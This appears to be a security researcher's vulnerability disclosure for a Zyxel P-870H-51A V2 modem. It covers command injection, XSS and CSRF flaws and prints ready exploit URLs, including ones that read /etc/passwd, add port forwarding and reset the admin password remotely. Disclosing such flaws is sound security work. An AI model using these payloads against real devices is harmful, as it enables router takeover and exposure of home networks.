Skip to content

Vulnerability Report: Zyxel P-870H-51A V2

Published: at 02:00 AM

This is a vulnerability report for Zyxel P-870H-51A V2 ADSL2 modem (multiple vulnerabilities).


Technical specifications


Disclosure timeline


Remote Command Execution

Requires that the user is logged in. Output is shown. Can be exploited remotely as CSRF vulnerability (however, the attacker does not receive the output).

http://192.168.1.1/DiagGeneral.cgi?diagAddr=google.fi;%20cat%20/etc/passwd&diagTestType=1

Since the default shell of the Linux distribution is very limited, it may be handy to run commands via sh:

http://192.168.1.1/DiagGeneral.cgi?diagAddr=google.fi;%20sh%20-c%20ifconfig%20-a&diagTestType=1

Cross-site scripting

http://192.168.1.1/DiagGeneral.cgi?diagAddr=google.fi';alert('xss');//&diagTestType=1

Cross-site request forgery

Can do many actions, such as add port forwarding rules to internal network. Just redirect the victim to following URL:

http://192.168.1.1/portForwarding.cmd?action=add&enableNAT=TRUE&srvName=asdf&dstWanIf=ptm0_1&srvAddr=192.168.1.123&wanIp=&proto=1,&eStart=1234,&eEnd=1234,&iStart=1234,&iEnd=1234,

Requests that trigger “change password” and “reboot” require sessionKey-parameter and thus cannot be forged. Wait, let’s see again. The device contains a non-standard Unix passwd command - which does not require the “current” password:

 > passwd

Usage: passwd <supervisor|admin|user> <password>
 passwd --help
 >

Hence, by combining this CSRF vulnerability and RCE, the attacker can remotely change the admin password:

http://192.168.1.1/DiagGeneral.cgi?diagAddr=google.fi;%20passwd%20admin%20newpasswd

Previous Post
Hackers Gonna Hack, or Get Hacked
Next Post
Overview of PHP.net Hacking Case